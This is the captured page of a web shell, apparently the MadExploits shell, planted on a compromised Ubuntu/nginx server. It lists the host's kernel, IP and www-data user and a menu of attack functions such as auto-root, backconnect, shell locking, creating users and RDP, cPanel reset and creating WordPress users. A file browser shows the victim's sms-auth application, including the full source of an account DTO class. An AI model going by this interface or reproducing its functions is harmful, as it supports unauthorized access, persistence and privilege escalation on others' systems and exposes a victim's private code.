Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.2
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sms-auth /
app /
Modules /
Auth /
DTO /
[ HOME SHELL ]
Name
Size
Permission
Action
AccountDTO.php
1.07
KB
-rw-rw-r--
AccountUserDTO.php
2.46
KB
-rw-rw-r--
GetAccountDTO.php
559
B
-rw-rw-r--
LoggedUserDTO.php
1.69
KB
-rw-rw-r--
LoginDTO.php
862
B
-rw-rw-r--
SelectAccountDTO.php
1.3
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SelectAccountDTO.php
<?php namespace App\Modules\Auth\DTO; use Spatie\DataTransferObject\DataTransferObject; class SelectAccountDTO extends DataTransferObject { public int $id; public string $uuid; public string $email; public ?int $phone = null; public int $is_active; public string $token; public int $is_configured; public array $role; public object $account_user; public string $subscription_expire; /** * Transform the resource into an array. * * @param accounts{} $params * @return array */ public static function toJsonResponse($params) { $role = is_string($params->role) ? array($params->role) : $params->role->toArray() ; return new self([ 'id' => $params->id, 'uuid' => $params->uuid, 'email' => $params->email, 'phone' => $params->phone, 'is_active' => $params->is_active, 'is_configured' => $params->is_configured, 'token' => $params->token, 'role' => $role, 'account_user'=> AccountUserDTO::toJsonResponse($params->account_user), 'subscription_expire' => !empty($params->account_user->account->subscription) ? $params->account_user->account->subscription->end_date_ad : '', ]); } }
Close